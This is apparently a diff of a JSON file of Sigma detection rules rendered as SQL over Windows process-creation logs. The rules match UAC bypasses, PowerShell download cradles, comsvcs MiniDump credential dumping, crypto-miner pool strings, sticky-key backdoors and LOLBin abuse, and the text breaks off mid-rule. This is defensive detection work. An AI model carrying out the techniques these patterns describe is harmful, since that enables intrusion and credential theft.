"filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" }, { - "title": "CL_LoadAssembly.ps1 Proxy Execution", - "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", - "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", - "author": "frack113", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", - "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "title": "Suspicious Execution of InstallUtil Without Log", + "id": "d042284c-a296-4988-9be5-f424fadcc28c", "status": "test", - "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute 
malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "author": "frack113", "tags": [ - "attack.t1218", "attack.defense_evasion" ], "falsepositives": [ - "The process spawned by vsjitdebugger.exe is uncommon." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND NewProcessName LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + "filename": "proc_creation_win_instalutil_no_log_execution.yml" }, { - "title": "Active Directory Structure Export Via Csvde.EXE", - "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "title": "HackTool - SharpLDAPmonitor Execution", + "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "status": "experimental", - "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects execution of the SharpLDAPmonitor. 
Which can monitor the creation, deletion and changes to LDAP objects.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csvde_export.yml" + "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" }, { - "title": "DirLister Execution", - "id": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "title": "Greedy File Deletion Using Del", + "id": "204b17ae-4007-471b-917b-b917b315c5db", "status": "experimental", - "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", + "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. 
This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Legitimate use by users" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'DirLister.exe' OR NewProcessName LIKE '%\\\\dirlister.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dirlister_execution.yml" + "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "PowerShell Download Pattern", + "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a Powershell process that contains download commands in its command line string", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi 
Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_powershell_download_patterns.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" - ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" - }, - { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", - "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' 
ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", + "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' 
OR OriginalFileName = 'DataSvcUtil.exe'))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' 
ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1562.004" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. 
The FP rate should be very low except for tools that use a similar flag structure" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE 
'\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ - "Legitimate WinRM usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1496" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine 
LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", - "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. 
Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "title": "Lolbin Defaultpack.exe Use As Proxy", + "id": "b2309017-4235-44fe-b5af-b15363011957", + "status": "experimental", + "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1218", + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE 